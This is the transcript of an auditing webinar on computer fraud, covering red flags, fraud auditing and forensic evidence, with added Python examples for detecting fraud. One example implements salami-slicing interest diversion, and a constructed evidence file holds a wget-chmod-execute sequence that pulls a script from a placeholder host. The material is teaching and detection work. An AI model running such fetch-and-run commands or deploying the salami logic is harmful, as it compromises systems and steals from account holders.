5/12/2015
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
AuditNet® Training without Travel™
IT Fraud and Countermeasures May 12 2015
Guest Presenter:
Richard Cascarino,
MBA, CIA, CISM, CFE
Richard Cascarino &
Associates
Jim Kaplan CIA CFE
• President and Founder of
AuditNet®, the global resource
for auditors (now available on
Apple and Android and Windows
devices)
• Auditor, Web Site Guru,
• Internet for Auditors Pioneer
• Recipient of the IIA’s 2007
Bradford Cadmus Memorial
Award.
• Author of “The Auditor’s Guide
to Internet Resources” 2nd
Edition
Richard Cascarino MBA CIA CISM CFE
• Principal of Richard Cascarino &
Associates based in Colorado USA
• Over 30 years experience in IT
audit training and consultancy
• Past President of the Institute of
Internal Auditors in South Africa
• Member of ISACA
• Member of Association of Certified
Fraud Examiners
• Author of Auditor's Guide to IT
Auditing
Webinar Housekeeping
• This webinar and its material are the property of AuditNet® and Richard Cascarino
and Associates. Unauthorized usage or recording of this webinar or any of its material
is strictly forbidden. We are recording the webinar and you will be provided with a link
access to that recording as detailed below. Downloading or otherwise duplicating the
webinar recording is expressly prohibited.
• Webinar recording link will be sent via email within 5-7 business days.
• NASBA rules require us to ask polling questions during the Webinar and CPE
certificates will be sent via email to those who answer ALL the polling questions
• The CPE certificates and link to the recording will be sent to the email address you
registered with in GTW. We are not responsible for delivery problems due to spam
filters, attachment restrictions or other controls in place for your email client.
• Submit questions via the chat box on your screen and we will answer them either
during or at the conclusion.
• After the Webinar is over you will have an opportunity to provide feedback. Please
complete the feedback questionnaire to help us continuously improve our Webinars
• If GTW stops working you may need to close and restart. You can always dial in and
listen and follow along with the handout.
• The views expressed by the presenters do not necessarily represent the
views, positions, or opinions of AuditNet® or the presenters’ respective
organizations. These materials, and the oral presentation accompanying
them, are for educational purposes only and do not constitute accounting
or legal advice or create an accountant‐client relationship.
• While AuditNet® makes every effort to ensure information is accurate and
complete, AuditNet® makes no representations, guarantees, or warranties
as to the accuracy or completeness of the information provided via this
presentation. AuditNet® specifically disclaims all liability for any claims or
damages that may result from the information contained in this
presentation, including any websites maintained by third parties and
linked to the AuditNet® website
• Any mention of commercial products is for information only; it does not
imply recommendation or endorsement by AuditNet®
Today’s Agenda
• The nature of computer fraud
• The Corporate risk profile
• Computer fraud techniques
• Why computer fraud and who commits it?
• Fraud auditing
• Fraud awareness
• EDI and fraud
• Forensic auditing
• Sources of evidence and audit tools
• Legal evidence
• Reporting sensitive issues
“Fraud and deceit abound in
these days more than in
former times”.
SIR EDWARD COKE (1602)
What is Fraud?
As a Crime
"Fraud is a generic term, and embraces all the
multifarious means which human ingenuity can
devise, which are resorted to by one individual,
to get an advantage over another by false
representations. No definite and invariable rule
can be laid down as a general proposition in
defining fraud, as it includes surprise, trick,
cunning, and unfair ways by which another is
cheated. The only boundaries defining it are
those which limit human knavery."
Michigan Criminal Law
What is Fraud?
IIA's Definition
Fraud encompasses an array of irregularities and illegal acts
characterized by intentional deception. It can be perpetrated for
the benefit of or to the detriment of the organisation and by
persons outside as well as inside the organisation - IIA
Why is Fraud Committed?
Achieve a personal or organizational goal
Satisfy a human need
Why by dishonest means?
Keen and predatory competition
Economic survival
"All's fair in love and war"
"Business is amoral anyway"
"Because it's easy"
What is IT Fraud?
A fraud in which a computer is used to
commit or abet the fraud
A fraud in which the computer is itself
the victim
Includes
Embezzlement
Theft of property
Theft of proprietary information
Forgery
Counterfeiting
Electronic eavesdropping
Exceeding the user's authority
Impersonation of an authorized user
New Crime?
Changed form of older crimes
Electronic entries in the books
An occupational crime requiring
Skills
Knowledge
Access
Easier for the insider than the outsider
Nature of IT Fraud - 1
Changes to Source Documents
Prior to Processing
Unauthorized On-line Access
Piggy Backing
Impersonation
Fictitious Transactions
Unauthorized Programs
Unauthorized Reports
Direct Changes to Programs, Data,
Output
Using Utilities or Special Programs
Nature of IT Fraud - 2
Trojan Horse / Logic Bombs / Trap Doors
Use of Unauthorized Coding
Salami Techniques
A small amount from everyone
Viruses
Mainframe as well as Micro
Sabotage and Industrial Espionage
Degrading Systems Performance
Leaking Confidential Information
Management Fraud
Cooked Books
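The salami technique listed above takes a fraction of a cent from every account on a run and sweeps it somewhere the insider controls, so the batch total still balances. The following is an added example, not code from the slides: it simulates an interest posting both honestly and with truncation-and-sweep, and then shows the reperformance test (recompute every account, look for credits to accounts with no balance, and test the direction of the rounding residuals) that does catch it. Balances, the rate and the account ids, including the slush account A9999, are constructed.

```python
"""Salami slicing on an interest run, and the reperformance test that catches
it. Added example, not from the slides. Balances, rate and account ids are
constructed; A9999 is the hypothetical account the insider controls.
"""
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_UP

CENT = Decimal("0.01")
RATE = Decimal("0.0275")        # constructed periodic interest rate
SLUSH = "A9999"                 # hypothetical account the shavings are swept into

# Constructed balance file: account -> balance
BALANCES = {
    "A1001": Decimal("1234.56"),
    "A1002": Decimal("98765.43"),
    "A1003": Decimal("550.10"),
    "A1004": Decimal("20000.00"),
    "A1005": Decimal("3333.33"),
}


def exact_interest(balance):
    """Full-precision interest: what the customer is actually owed."""
    return balance * RATE


def post_interest_honest(balances):
    """Correct posting: round half-up to the cent, nothing diverted."""
    return {a: exact_interest(b).quantize(CENT, rounding=ROUND_HALF_UP)
            for a, b in balances.items()}


def post_interest_salami(balances):
    """Fraudulent posting: truncate every customer's interest to the cent and
    sweep the shaved fractions into SLUSH. No customer loses a full cent, and
    the run total still agrees to within rounding."""
    posted, shaved = {}, Decimal("0")
    for a, b in balances.items():
        exact = exact_interest(b)
        posted[a] = exact.quantize(CENT, rounding=ROUND_DOWN)
        shaved += exact - posted[a]
    posted[SLUSH] = shaved.quantize(CENT, rounding=ROUND_DOWN)
    return posted


def run_total(posted):
    """The batch-total control most shops rely on. It does not see the salami."""
    return sum(posted.values(), Decimal("0"))


def reperformance_test(balances, posted):
    """Recompute every account and compare (the audit 'reperform' approach):
      unknown_accounts: credited accounts with no balance to earn interest on
      mismatched:       accounts whose posting is not the correctly rounded amount
      systematic_bias:  every non-zero rounding residual points the same way;
                        honest half-up rounding scatters residuals both ways
    """
    expected = post_interest_honest(balances)
    residuals = [posted[a] - exact_interest(balances[a]) for a in balances if a in posted]
    nonzero = [r for r in residuals if r != 0]
    return {
        "unknown_accounts": sorted(a for a in posted if a not in balances),
        "mismatched": sorted(a for a in balances if posted.get(a) != expected[a]),
        "systematic_bias": bool(nonzero) and (all(r < 0 for r in nonzero) or all(r > 0 for r in nonzero)),
    }
```

On this sample the honest and salami run totals differ by one cent, which a batch-total check with any tolerance accepts; the per-account recomputation flags three accounts and the slush account immediately. On a real run the sign test is applied over thousands of postings rather than five, where honest rounding produces residuals of both signs in roughly equal numbers.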
MOMM Concept
Motivation
Economic - financial gain
Ideological - normally revenge
Egocentric - need to show off
Psychotic - distorted sense of reality
Opportunities
Inadequate Systems Controls
Accounting Control
Access Control
Inadequacy in Management Controls
Reward System
Ethical Climate
Climate for Trust
Means
Compromising Controls / Personnel / Technology
Methods
Input Scams / Throughput Scams / Output Scams
Polling Question 1
Establishing the
Corporate Risk Profile
Knowledge of the organization's business and
industry
Determination of the nature of the business and the
way it is conducted
Identification of any special legal or commercial
requirements
Identification of any industry-specific accounting
principles or policies
Identification of any significant information relied
upon by management in the control of the business
Identification of high-level control and operating
issues
Areas to be Covered
Organizational structure
Key executive responsibilities
Role of the Board of Directors, Audit
Committee, Internal Auditors
Management's judgments and integrity
Performance planning and monitoring
Policies and procedures for control and
accountability
Nature and organisation of
Computerized Information
Primary Objectives - 1
To determine
Level of risk inherent in the organization's
business environment
Appropriateness of the organizational structure
Appropriateness of levels of authority within
the internal control structures
Apparent quality of management's judgments
and estimates
Whether the environment is likely to be
conducive to maintaining reliable internal
controls
Primary Objectives - 2
Extent to which management decision making is
influenced by Information Systems
Extent of asset control exercised by Information
Systems
Degree of reliance on revenues recorded on
Information Systems
Degree of reliance on expenses recorded on
Information Systems
Volume and average value of transactions
through Information Systems
Other Items to Determine
Quality of personnel recruitment
Corporate ethical climate
Systems of authority
Quality of Internal Control
Scope and skills of audit
IT Risk Management
Accept the risk
Reduce the risk
Transfer the risk
NOT
Ignore the risk
Knowing the risk
Risk Profile Assessment
Must be
Simple
Practical
Quick
Common-sense
Business oriented
Technically competent
Establishing a Risk Profile
Involves Assessment of
Physical security
Personnel security
Data security
Applications software security
Systems software security
Telecommunications security
Operations security
Quantification of the risk factors
Risk Ranking - 1
Business Risk
Nature of Transactions
Value per transaction
Total daily value of transactions
Total accountability
Liquidity
Data
Nature of Operating Environment
Impact on users
Pressure
Functional complexity
Processing sophistication
Risk Ranking - 2
Performance Risk
Controls and Security
Access
Environmental
Verification of value of data
Verification of records
Separation / Rotation of duties
Completeness of records
Accountability
Accounting principles
External reviews
Documentation
Contingency Planning
Use as Management Information
Most Common Frauds
False vendor, supplier or contractor
invoice
False governmental claim
False fringe benefit claim
False refund or credit claim
False payroll claim
False expense claim
Where are we Vulnerable?
Information Processing Center
Networks
Input Origination
Input Entry
Processing
Output Handling
Output Disposal
Polling Question 2
Fraud Symptoms, Red Flags
and Fraud Indicators
Operating performance anomalies
Organisational Structure
Management characteristics
Accounting anomalies
Internal control weaknesses
Analytical anomalies
Unusual behaviour
Operating Performance
Anomalies
Unexplained changes in Financial
Statement balances.
Urgent need to report favourable
earnings
High debt or interest burdens
Cash flow problems
Unusual or large and profitable
transactions near the end of
accounting periods
Accounting Anomalies
Missing documents.
Excessive voids or credits.
Increased reconciliation items.
Alterations on documents.
Duplicate payments.
Common names or addresses of
payees or customers
Increased past due accounts.
Internal Control
Weaknesses
Lack of segregation of duties
Lack of physical safeguards
Lack of independent checks
Lack of proper authorisation
Lack of proper documents and records
Overriding of existing controls
Common Data Fraud Areas
Corporate card fraud
Invoicing for goods not delivered
Duplicate Invoices
Kickbacks / Bribes
Increasing of Invoiced amounts and
splitting the monies
Fictitious / Ghost employees
Carrying Employees on payrolls beyond
actual severance dates
Overtime fraud
Cheque fraud
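Several of the accounting anomalies and data fraud areas listed above (duplicate payments, common addresses between payees and insiders, ghost employees, employees carried past severance) are exactly the tests generalized audit software is run for. The following is an added example, not code from the slides or from any audit package: it runs those three tests over small constructed AP, vendor master, HR master and payroll extracts. Record layouts and the address normalisation rules are assumptions about a typical extract.

```python
"""Generalized-audit-software style tests for three of the data frauds listed
above: duplicate invoices, vendors sharing an address with an employee, and
payroll to ghost or severed employees.

Added example, not from the slides. All records are constructed sample data
and the field layouts are assumptions about a typical AP/HR extract.
"""
import re
from collections import defaultdict
from datetime import date

# Constructed AP extract: (vendor_id, invoice_no, amount, paid_on)
INVOICES = [
    ("V100", "INV-2015-0042", 1250.00, date(2015, 3, 2)),
    ("V100", "INV 2015 0042", 1250.00, date(2015, 3, 30)),  # same invoice, re-keyed
    ("V100", "INV-2015-0043", 1250.00, date(2015, 4, 1)),   # different invoice, same amount
    ("V205", "7781", 980.50, date(2015, 3, 9)),
    ("V205", "7781", 980.50, date(2015, 3, 9)),             # exact duplicate
    ("V310", "A-1", 4990.00, date(2015, 4, 15)),
]
# Constructed vendor master: vendor_id -> (name, address)
VENDORS = {
    "V100": ("Acme Supplies", "45 Station Rd, Springfield"),
    "V205": ("Bolt & Nut Co", "77 Mill Road, Springfield"),
    "V310": ("JS Consulting", "12 High Street, Springfield"),  # see employee E01
}
# Constructed HR master: emp_id -> (name, address, termination_date or None)
EMPLOYEES = {
    "E01": ("J. Smith", "12 High St, Springfield", None),
    "E02": ("P. Jones", "3 Oak Avenue, Shelbyville", date(2015, 2, 28)),
    "E03": ("R. Brown", "9 Elm Ct, Springfield", None),
}
# Constructed payroll run: (emp_id, pay_date, net_pay)
PAYROLL = [
    ("E01", date(2015, 3, 31), 3100.00),
    ("E02", date(2015, 3, 31), 2800.00),  # paid a month after termination
    ("E03", date(2015, 3, 31), 2950.00),
    ("E04", date(2015, 3, 31), 2700.00),  # no HR record at all
]


def norm_key(s):
    """Collapse case, spacing and punctuation so 'INV-2015-0042' == 'INV 2015 0042'."""
    return re.sub(r"[^A-Z0-9]", "", s.upper())


def norm_address(s):
    """Crude address normalisation: upper-case, strip punctuation, common abbreviations."""
    s = re.sub(r"[^A-Z0-9 ]", "", s.upper())
    for word, short in (("STREET", "ST"), ("ROAD", "RD"), ("AVENUE", "AVE")):
        s = re.sub(rf"\b{word}\b", short, s)
    return re.sub(r"\s+", " ", s).strip()


def duplicate_invoices(invoices):
    """Same vendor, same normalised invoice number, same amount, paid more than once."""
    groups = defaultdict(list)
    for vendor, inv_no, amount, paid_on in invoices:
        groups[(vendor, norm_key(inv_no), round(amount, 2))].append(paid_on)
    return sorted(key for key, dates in groups.items() if len(dates) > 1)


def vendor_employee_address_matches(vendors, employees):
    """Vendors whose address normalises to an employee's address."""
    by_addr = defaultdict(list)
    for emp_id, (_, addr, _) in employees.items():
        by_addr[norm_address(addr)].append(emp_id)
    return sorted((vendor_id, emp_id)
                  for vendor_id, (_, addr) in vendors.items()
                  for emp_id in by_addr.get(norm_address(addr), []))


def payroll_exceptions(payroll, employees):
    """Pay to ids absent from the HR master (ghosts) or dated after termination."""
    ghosts, after_term = [], []
    for emp_id, pay_date, _ in payroll:
        if emp_id not in employees:
            ghosts.append(emp_id)
        elif employees[emp_id][2] is not None and pay_date > employees[emp_id][2]:
            after_term.append(emp_id)
    return {"ghost": ghosts, "after_termination": after_term}


if __name__ == "__main__":
    print(duplicate_invoices(INVOICES))
    print(vendor_employee_address_matches(VENDORS, EMPLOYEES))
    print(payroll_exceptions(PAYROLL, EMPLOYEES))
```

Note what the duplicate test deliberately does not flag: V100's third invoice for the same amount under a different number. That is a weaker "same vendor, same amount, within 30 days" test, and is normally run separately because it produces far more false positives.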
Common Mistakes
• Failure to maintain proper documentation
• Failure to notify decision makers
• Failure to control digital evidence
• Failure to report the incident in a timely manner
• Underestimating the scope of the incident
• No incident response plan in place
• Technical mistakes
– Altering date and time stamps on evidence systems before
recording them
– Killing rogue processes
– Patching the system back together before investigation
– Not recording commands used
– Using untrusted commands and tools
– Overwriting evidence by installing tools
Access to Records
Normal Input Transactions
Changes to Operating System Software
Changes to Application Programs
Physical Substitution of Stored Data
Use of Unauthorized Programs
Changes to / Substitutions of Output
Reports
Polling Question 3
Who Commits Computer
Fraud?
Users
Management
IT Auditors
IT Staff
Outsiders
Collusion
Users
Have access to assets
Have legitimate access to computer
systems
Have adequate (too much?) authority
levels
Know the systems weaknesses
May be responsible for error handling
Account for almost 50% of all computer
fraud
Management
Also have access to assets
Also have legitimate access to computer
systems
May have override authorities
Know the systems weaknesses (Audit
told them)
May be responsible for reconciliations
Are responsible for internal control
Account for some 15% of computer
fraud
IT Auditors
May have access to assets
Have legitimate access to computer
systems
Often have too much authority within
systems
Know the system weaknesses
Account for some 5% of computer fraud
IT Staff
Usually do not have access to assets
except where the data is itself the asset
Should not have access to live systems
but often do
May be able to bypass system controls
May not know of, or be able to affect
user controls
May design / program in fraud
Account for some 3% of computer fraud
Outsiders
Usually have no access to assets
Usually do not know the systems
Cause damage more than fraud
Have the requisite skill levels
Know the environmental weaknesses
Account for less than 1% of computer
fraud
Is a potential growth area
Collusion
Is the hardest to detect / prevent / prove
Access to assets is available
Access to systems is available
Weaknesses are known
Needed authorities are available
Internal control may be exercised by the
very perpetrators
What is Fraud Auditing?
Creation of an environment that encourages the
detection and prevention of fraud in commercial
transactions
Combination of
Audit skills
Computer skills
Criminal-investigative skills
Not a checklist
Includes
Human element
Organizational behavior
Knowledge of fraud
Evidence and standards of proof
Principles of Fraud
Auditing
Less a methodology, more an attitude
Focus is on
Exceptions
Oddities
Accounting irregularities
Patterns of conduct
Primarily learned from experience (think like a thief)
Materiality is not a major issue
Fraud may come at any stage (Input / Processing /
Output)
Most common schemes perpetrated by lower-level
employees
Most common schemes involve disbursements
Principles of Fraud
Auditing
Most higher-level frauds involve "profit
smoothing"
Deferring expenses
Booking sales too early
Overstating inventory
Kiting sales
Frauds are more often caused by the absence of
controls than by loose controls
Most frauds are found by accident
Fraud losses are growing exponentially
Most effective prevention is a combination of
adequate Internal Controls and an ethical climate
Fraud Questions?
What is the nature of the system?
Where are the weak links?
What deviations are possible?
Who can access?
Who can authorize?
What is the simplest way to compromise
the system?
Who has bypass capability?
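"Who can access, who can authorize, who has bypass capability" are answered from the application's user and role extract compared against the signed authority matrix. The following is an added example, not code from the slides: it computes each user's effective permissions through their roles, lists segregation-of-duties conflicts, reports rights held beyond what the matrix approves (the required-versus-actual gap) and names the accounts that can switch controls off. Users, roles, permission names and the conflict pairs are constructed for a hypothetical accounts-payable system.

```python
"""Who can access, who can authorize, who has bypass capability: checks over a
user/role extract against the signed authority matrix.

Added example, not from the slides. Users, roles, permission names and the
segregation-of-duties conflict pairs are constructed for a hypothetical
accounts-payable system; a real review takes them from the application's
security extract and the organisation's own SoD policy.
"""

# Constructed role definitions: role -> permissions granted
ROLES = {
    "ap_clerk":      {"vendor.create", "invoice.enter"},
    "ap_supervisor": {"invoice.approve"},
    "treasury":      {"payment.release"},
    "sysadmin":      {"system.bypass_controls", "user.admin"},
    "auditor_ro":    {"report.read"},
}
# Constructed actual assignments pulled from the system
USER_ROLES = {
    "alice": {"ap_clerk"},
    "bob":   {"ap_clerk", "ap_supervisor"},   # enters and approves the same invoices
    "carol": {"treasury"},
    "dave":  {"sysadmin", "ap_supervisor"},   # can bypass controls and approve
    "erin":  {"auditor_ro", "treasury"},      # auditor holding a live payment right
}
# Constructed signed authority matrix: what each person is approved to hold
APPROVED = {
    "alice": {"vendor.create", "invoice.enter"},
    "bob":   {"invoice.approve"},
    "carol": {"payment.release"},
    "dave":  {"system.bypass_controls", "user.admin"},
    "erin":  {"report.read"},
}
# Pairs no single person should hold (assumed policy)
SOD_CONFLICTS = [
    ("vendor.create", "invoice.approve"),
    ("invoice.enter", "invoice.approve"),
    ("invoice.approve", "payment.release"),
    ("system.bypass_controls", "invoice.approve"),
    ("system.bypass_controls", "payment.release"),
]


def effective_permissions(user):
    """Union of every permission reachable through the user's roles."""
    return set().union(*(ROLES[r] for r in USER_ROLES.get(user, ())))


def sod_violations():
    """Users holding both halves of a conflict pair, listed in policy order."""
    out = {}
    for user in USER_ROLES:
        perms = effective_permissions(user)
        hits = [pair for pair in SOD_CONFLICTS if pair[0] in perms and pair[1] in perms]
        if hits:
            out[user] = hits
    return out


def excess_permissions():
    """Actual rights beyond the signed matrix (the 'required vs actual' gap)."""
    out = {}
    for user in USER_ROLES:
        extra = effective_permissions(user) - APPROVED.get(user, set())
        if extra:
            out[user] = sorted(extra)
    return out


def bypass_capable():
    """Accounts that can switch controls off; these need the closest monitoring."""
    return sorted(u for u in USER_ROLES
                  if "system.bypass_controls" in effective_permissions(u))


if __name__ == "__main__":
    print(sod_violations())
    print(excess_permissions())
    print(bypass_capable())
```

The three reports answer different questions: a conflict can exist with every right formally approved (a role that bundles entry and approval), an excess right may not conflict with anything yet still be outside the matrix (erin's payment release), and a bypass account is a finding regardless of what else it holds.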
Fraud Auditor's Objective
To determine whether a fraud, theft or
embezzlement has occurred
Is there a criminal law?
Was there an apparent breach of that
law?
Who was the perpetrator?
Who was the victim?
How can it be proven?
Detection Awareness
for the Fraud Auditor
Invitations to theft
High Fraud Environments
Low Fraud Environments
Red Flags and Indicators
Fraud Detection
Control and Overcontrol
Approaches to Fraud
Detection
Reactive
Allegations and Complaints
Suspicions
Intuition
Proactive
Adequate Internal Controls
Periodic Audits
Intelligence gathering
Review of Variances
Logging of Exceptions
Control and Overcontrol
Polling Question 4
EDI and Fraud
What is Electronic Data Interchange
Systems allowing the movement of money with:
Immediate / Same Day Value (Transaction)
Immediate Advisement / Confirmation (Information)
On-line Intra-day Monitoring / Credit (Credit)
Remote, User-friendly Initiation / Reporting (Access)
Full Electronic Audit Trail (Service)
Enhanced Data Security / Disaster Recovery (Security)
What is Forensic Accounting
Forensic "belonging to, used in, or suitable
to courts of judicature or to public
discussion and debate" - Webster
Not always criminally related
Forensic Accounting relates to evidence
suitable for a court of law - either civil or
criminal
Reactive rather than proactive
Forensic accountant deals with
Criminal Complaints
Civil Statements of claim
Corporate Rumors and inquiries
Required of the Forensic
Computer Auditor - 1
A knowledge of accounting
A knowledge of the business sector
A knowledge of the computer systems
Hardware
Software
Operating environment
Threats
Vulnerabilities
Required of the Forensic
Computer Auditor - 2
Experience and judgment
A knowledge of investigative techniques
A knowledge of evidence
A knowledge of relevant statutes
Scope of Forensic Auditing
Not restricted by materiality
Not restricted by Generally Accepted
Accounting Standards
Use of sampling is not generally
acceptable in procuring evidence
Assumption of integrity of management
and documentation
An opinion on the findings may not be
required
Search for "Best Evidence"
Evidence Required
Job role of the suspect
Degree of control normally exercised by the
suspect
Access rights (required and actual)
Knowledge by the suspect of the computer system
Extent of the fraud
Systematic pattern used in covering up the fraud
Financial position of the suspect (motive and
benefit)
If in doubt err on the side of the suspect
Sources of Evidence
and Audit Tools
Non-computer evidence
Computer evidence
Non-computer audit tools and
techniques
Computerized audit tools and
techniques
Non-computer Evidence
System Documentation
Interviews with Users / IS staff
Procedure Manuals
Job Descriptions
Authority Matrices
Security Environment
System Documentation
Flowcharts
Record Layouts
Error Lists
Input Documents
Output Reports
Narrative Descriptions
Clerical Instructions
Additional Documentation
Data Retention Requirements
User Procedure Manuals
User Override Authorities
"UNOFFICIAL" Documentation
Run Logs
Run Schedules
Timesheets
Interviews
Interviews reflect opinions not facts
Many frauds are discovered by tip-off
The "Honest Broker"
Non-verbal clues
Document all Interviews immediately
Polling Question 5
Computer Evidence
Input Documents
Run Logs
Outputs Produced
Output from Audit Tests
Access Logs
Authority Lists
Non-Computer Tools and
Techniques
"ANY TANGIBLE AID"
Tools to obtain information
Interviews
Questionnaires
Analytical audit flowcharts
Flowcharting software
Documentation review
Non-Computer Tools and
Techniques
Tools to evaluate controls
Application control cube
IT areas
Components
Threats
Adequate
Inadequate
Non-Computer Tools and
Techniques
Tools to verify controls
Audit around
Test data
Reperformance of key functions
Reprocess selected items
Computer Tools and
Techniques
Automated tools (CAATs)
Test data generators
Flowcharting packages
Specialized audit software
Generalized audit software
Utility programs
Specialized Audit Software
Can accomplish any audit task but
High development and maintenance cost
Require specific I.S. Skills
Must be "verified" if not written by the auditor
High degree of obsolescence
Computer Tools and
Techniques
Generalized Audit Software
"Prefabricated" audit tests
Each use is a one-off
Auditor has direct control
Lower development cost
Fast to implement
Applications of Generalized
Audit Software
Detective examination of files
Verification of processing controls
File interrogations
Management inquiries
Types of audit software
Program generators
Macrolanguages
Audit-specific tools
Data downloaders
Micro-based software
Audit Software Functions
File access
Format access
Arithmetic operations
Logic operations
Record handling
Update
Output
Statistical
File comparison
Graphics
Legal Evidence and Rules
for Prosecution
What is Evidence?
Rules of Evidence
Legal vs Audit Evidence
Use of Computer Evidence
What is Evidence?
Something intended to prove or support
a belief
Each piece may be flawed
Personal bias
Potential error of measurement
Less competent than desirable
In total the "body of evidence"
Should provide a factual basis for audit
opinions
Standards of Audit Evidence
IIA Standards state that auditors
“should collect, analyze, interpret and
document information to support audit
results"
Information should be
Related to the audit objectives
Pertinent to the scope of work
Systematically gathered
Rules of Evidence
Primarily designed for legal evidence
May have to be complied with in legal
cases
Evidence whose value as proof is offset
by a prejudicial effect may be excluded
The auditor is not normally so restricted
Any evidence
Professional judgment
Until the auditor is satisfied
Legal vs Audit Evidence
Common objective
Provide proof
Foster an honest belief
Different focus
Legal relies heavily on oral evidence
Audit relies more on documentary evidence
Legal Evidence must be lawfully
gathered
Relevant Evidence
Evidence regarding
Motive for the crime
Ability of defendant to commit the crime
Opportunity to commit the crime
Threats by the suspect
Means to commit the crime
Evidence linking the suspect to the actual
crime
Suspect's conduct and comments at the time of
arrest
Attempt to conceal User identity
Attempt to destroy evidence
Valid confessions
Chain of Custody
Evidence obtained should be
Marked
Identified
Inventoried
Preserved
If gaps in the chain of custody occur
Evidence may be ruled invalid
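The "marked, identified, inventoried, preserved" requirement here, and the technical mistakes listed earlier under Common Mistakes (altering timestamps, overwriting evidence, not recording what was done), come down to one discipline: hash everything at acquisition, and record every handover against that hash. The following is an added example, not code from the slides: it builds an evidence manifest, verifies a working set against it, and walks a custody log looking for two kinds of break, a handover whose giver was never recorded as receiving the item, and a hash that no longer matches the one taken at collection. The evidence items, the people named and the manifest layout are all constructed.

```python
"""Evidence inventory and chain-of-custody check.

Added example, not from the slides. The evidence items, the people named in
the handover records and the manifest layout are all constructed; a real
collection hashes disk or memory images read through a write blocker.
"""
import hashlib

# Constructed evidence items (name -> bytes), standing in for log files and
# images; the content is invented.
EVIDENCE = {
    "srv01-auth.log": b"May 12 03:14:07 srv01 sshd[2211]: Accepted password for root from 10.0.0.9\n",
    "srv01-bash_history": b"wget http://example.invalid/x.sh\nchmod +x x.sh\n./x.sh\n",
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(items, collector, collected_at):
    """Mark, identify and inventory: one record per item with its hash, size,
    collector and collection time. Written once, at acquisition."""
    return {
        name: {"sha256": sha256_hex(data), "size": len(data),
               "collected_by": collector, "collected_at": collected_at}
        for name, data in sorted(items.items())
    }


def verify_manifest(manifest, items):
    """Re-hash the working set and report anything changed, missing or added."""
    return {
        "changed": [n for n, m in manifest.items()
                    if n in items and sha256_hex(items[n]) != m["sha256"]],
        "missing": [n for n in manifest if n not in items],
        "extra": sorted(n for n in items if n not in manifest),
    }


def record_handover(log, item, at, giver, receiver, data):
    """Append one custody transfer; the hash is recomputed at every handover."""
    log.append({"item": item, "at": at, "from": giver, "to": receiver,
                "sha256": sha256_hex(data)})


def custody_gaps(manifest, log):
    """Walk each item's handovers in time order. The person giving the item
    must be the one who last received it, and the hash must still be the one
    recorded at collection. Any break is a gap a court may reject."""
    problems = []
    for item, meta in manifest.items():
        holder = meta["collected_by"]
        for e in sorted((e for e in log if e["item"] == item), key=lambda e: e["at"]):
            if e["from"] != holder:
                problems.append(f"{item}: gap, {holder} -> {e['from']} not recorded before {e['at']}")
            if e["sha256"] != meta["sha256"]:
                problems.append(f"{item}: hash mismatch at {e['at']}")
            holder = e["to"]
    return problems


def demo():
    """Constructed scenario: one item handled properly, one with a gap and a
    modified copy. Returns (manifest, custody problems, verification result)."""
    manifest = build_manifest(EVIDENCE, "analyst1", "2015-05-12T03:40:00")
    log = []
    record_handover(log, "srv01-auth.log", "2015-05-12T04:00:00", "analyst1", "analyst2", EVIDENCE["srv01-auth.log"])
    record_handover(log, "srv01-auth.log", "2015-05-12T09:00:00", "analyst2", "locker", EVIDENCE["srv01-auth.log"])
    record_handover(log, "srv01-bash_history", "2015-05-12T04:05:00", "analyst1", "analyst2", EVIDENCE["srv01-bash_history"])
    # Someone worked on the copy before it reached the locker, and the locker
    # entry names a person who never signed for it.
    tampered = EVIDENCE["srv01-bash_history"] + b"rm x.sh\n"
    record_handover(log, "srv01-bash_history", "2015-05-12T10:00:00", "analyst3", "locker", tampered)
    working_set = {**EVIDENCE, "srv01-bash_history": tampered}
    return manifest, custody_gaps(manifest, log), verify_manifest(manifest, working_set)


if __name__ == "__main__":
    _, problems, check = demo()
    print("\n".join(problems))
    print(check)
```

The manifest is written once and never edited; every later step re-hashes and compares rather than trusting the record in hand, which is also what makes "not recording commands used" visible, since any tool that touches the evidence copy changes its hash.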
Polling Question 6
Reporting Sensitive Issues
Internal Auditor "the eyes and ears of management"
Reporting to legal authorities and media neither
required nor encouraged by IIA
Where such reporting is required by law then IIA
requires compliance
Code of Ethics requires loyalty in all matters
pertaining to the operations of the employer except
where in conflict with legal issues
Mandated to report wrongdoings internally as a
minimum
State of Virginia has laws protecting Internal
Auditors from firing for whistle-blowing
From a US Survey of 8000
Employees - 1
Most employees believe reporting wrongdoing
is ethical and morally right
Most employees who observe wrongdoing do
not report it to anyone
Internal auditors whose job entails reporting are
more likely to report wrongdoing
Employees who observe serious, well-
documented, or frequent wrongdoings are
more likely to report it
Employees who observe wrongdoings are more
likely to report when their organization's policies
encourage them to do so
From a US Survey of 8000
Employees - 2
A substantial number, though not a majority, of
employees who report wrongdoing suffer
retaliation of some sort, particularly when the
reporting is externalized
Retaliation is more likely if the wrongdoing is
serious
Internal Auditors suffer retaliation at about the
same rate as other employees, even though they
are mandated to report wrongdoing
Steps in Deciding to Report
Did wrongdoing occur?
Does the wrongdoing require action?
Am I responsible for acting?
What actions are available to me?
Will the benefits of acting outweigh the
costs?
Has previous action proved beneficial to
all parties?
Was my action effective?
Questions?
• Any Questions?
Don’t be Shy!
Coming Up Next
IT AUDIT ADVANCED
1. Advanced IT Audit Risk Analysis for Auditors May 19
2. Advanced IT Audit Securing the Internet May 21
3. Advanced IT Audit IT Security Reviews May 26
4. Advanced IT Audit Performance Auditing of the IT
Function May 28
5. Advanced IT Audit Managing the IT Audit Function June 2
Thank You!
Richard Cascarino, MBA, CIA, CISM, CFE
Richard Cascarino & Associates
970-291-1497
rcasc@rcascarino.com
Jim Kaplan
AuditNet LLC®
800-385-1625
www.auditnet.org
webinars@auditnet.org